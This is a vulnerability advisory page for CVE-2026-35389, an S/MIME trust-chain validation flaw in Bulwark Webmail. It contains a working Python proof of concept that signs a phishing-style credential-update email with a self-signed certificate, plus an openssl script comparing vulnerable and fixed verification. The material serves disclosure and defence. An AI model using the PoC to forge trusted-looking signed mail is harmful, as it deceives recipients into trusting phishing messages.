Security Vulnerability Report
CVE-2026-35389 CVSS 7.5 HIGH

Published: 2026-04-06 21:16:21
Last Modified: 2026-04-09 20:58:46

Description

Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to 1.4.11, S/MIME signature verification did not validate the certificate trust chain (checkChain: false): the CMS signature was checked against the public key of the certificate embedded in the message, but that certificate was never chained to a trusted CA. Any email signed with a self-signed or untrusted certificate was therefore displayed as having a valid signature, so a sender could mint a certificate carrying any name or address and have the client vouch for the message (CWE-295, Improper Certificate Validation). This vulnerability is fixed in 1.4.11.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:* - VULNERABLE
Bulwark Webmail < 1.4.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-35389: S/MIME signature verification bypass.

Signs an email with a self-signed certificate. Bulwark Webmail < 1.4.11
verified the CMS signature with checkChain: false, so the signer
certificate was never checked against a trust store and the message
was rendered as carrying a valid signature.

Requires the `cryptography` package; the signature is a real detached
PKCS#7 (multipart/signed S/MIME) structure built with its PKCS7 builder.
"""
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.serialization import pkcs7
from cryptography.x509.oid import NameOID


def generate_self_signed_cert():
    """Create an RSA key pair and a self-signed certificate for CN=Attacker."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Attacker")])
    now = datetime.datetime.now(datetime.timezone.utc)
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)  # issuer == subject: self-signed, no CA involved
        .public_key(key.public_key())
        .serial_number(1000)
        .not_valid_before(now)
        .not_valid_after(now + datetime.timedelta(days=10 * 365))
        .sign(key, hashes.SHA256())
    )
    return cert, key


def sign_message(msg_content: bytes, cert, key) -> bytes:
    """Return the message as multipart/signed S/MIME with a detached PKCS#7 signature."""
    print(f"[+] Signing message with self-signed certificate: {cert.subject.rfc4514_string()}")
    print("[+] Note: a verifier running with checkChain: false accepts this as valid.")
    return (
        pkcs7.PKCS7SignatureBuilder()
        .set_data(msg_content)
        .add_signer(cert, key, hashes.SHA256())
        .sign(serialization.Encoding.SMIME, [pkcs7.PKCS7Options.DetachedSignature])
    )


if __name__ == "__main__":
    cert, key = generate_self_signed_cert()
    print("[+] Generated self-signed certificate and private key.")
    subject = "Important Update"
    body = f"Subject: {subject}\n\nPlease click the link to update your credentials.\n".encode()
    signed = sign_message(body, cert, key)
    print(signed.decode())
    print("[+] Email signed successfully. Vulnerable Webmail will show 'Valid Signature'.")
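Added example, not Bulwark Webmail's code and separate from the PoC above: the same kind of self-signed signature is fed to two verifiers built on the openssl CLI, one that behaves like checkChain: false and one that validates the chain against a trust store. openssl's `-noverify` flag is used as the stand-in for checkChain: false; the "Example Corporate CA", the alice@example.com user certificate and the message body are constructed for the demonstration. A legitimately issued certificate is included as the positive control, so the fixed verifier is shown to still accept genuine signatures.

```shell
#!/bin/sh
# Added example (not Bulwark Webmail's code): reproduce the CVE-2026-35389
# condition with the openssl CLI. "openssl smime -verify -noverify" checks
# only the CMS signature and skips certificate chain validation, which is
# what checkChain: false amounted to; the hardened verifier passes a CA bundle.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed phishing body (assumption: the content is irrelevant to the bug)
printf 'Subject: Important Update\n\nPlease click the link to update your credentials.\n' \
  > "$WORK/msg.txt"

# Attacker side: a self-signed certificate that chains to nothing
openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 1 -subj "/CN=Attacker" \
  -keyout "$WORK/attacker.key" -out "$WORK/attacker.pem" 2>/dev/null
openssl smime -sign -in "$WORK/msg.txt" -signer "$WORK/attacker.pem" \
  -inkey "$WORK/attacker.key" -out "$WORK/attacker.eml"

# Defender side: a hypothetical organisational CA and a user certificate it
# issued with S/MIME key usage, signing the same body (positive control)
openssl req -x509 -newkey rsa:2048 -nodes -sha256 -days 1 \
  -subj "/CN=Example Corporate CA" -keyout "$WORK/ca.key" -out "$WORK/ca.pem" 2>/dev/null
openssl req -new -newkey rsa:2048 -nodes -sha256 -subj "/CN=alice@example.com" \
  -keyout "$WORK/alice.key" -out "$WORK/alice.csr" 2>/dev/null
printf 'keyUsage=digitalSignature\nextendedKeyUsage=emailProtection\n' > "$WORK/leaf.ext"
openssl x509 -req -in "$WORK/alice.csr" -CA "$WORK/ca.pem" -CAkey "$WORK/ca.key" \
  -CAcreateserial -days 1 -sha256 -extfile "$WORK/leaf.ext" -out "$WORK/alice.pem" 2>/dev/null
openssl smime -sign -in "$WORK/msg.txt" -signer "$WORK/alice.pem" \
  -inkey "$WORK/alice.key" -out "$WORK/alice.eml"

# Vulnerable behaviour (checkChain: false): any signature made by the key of
# the certificate embedded in the message passes, whoever issued that cert.
verify_without_chain() {
  openssl smime -verify -noverify -in "$1" -out /dev/null 2>/dev/null
}

# Fixed behaviour (checkChain: true): the embedded signer certificate must
# chain to a certificate in the trust store ($2) and be valid for S/MIME signing.
verify_with_chain() {
  openssl smime -verify -CAfile "$2" -in "$1" -out /dev/null 2>/dev/null
}

for m in attacker alice; do
  if verify_without_chain "$WORK/$m.eml"; then r=VALID; else r=REJECTED; fi
  echo "checkChain:false  $m.eml: $r"
  if verify_with_chain "$WORK/$m.eml" "$WORK/ca.pem"; then r=VALID; else r=REJECTED; fi
  echo "checkChain:true   $m.eml: $r"
done
```

Run it with `sh` on a host with the openssl binary. The self-signed message is VALID under the no-chain verifier and REJECTED once a trust store is consulted, while the CA-issued certificate is VALID under both. Chain validation only establishes that a trusted CA issued the certificate; a mail client additionally has to match the signer certificate's email address against the From: header, which `openssl smime -verify` does not do.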

References

https://github.com/bulwarkmail/webmail/security/advisories/GHSA-v6w6-338p-p256 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35389", "sourceIdentifier": "[email protected]", "published": "2026-04-06T21:16:20.580", "lastModified": "2026-04-09T20:58:45.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to 1.4.11, S/MIME signature verification did not validate the certificate trust chain (checkChain: false). Any email signed with a self-signed or untrusted certificate was displayed as having a valid signature. This vulnerability is fixed in 1.4.11."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.11", "matchCriteriaId": "1011888E-0A3E-46C3-9234-45C7E75C0A31"}]}]}], "references": [{"url": "https://github.com/bulwarkmail/webmail/security/advisories/GHSA-v6w6-338p-p256", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}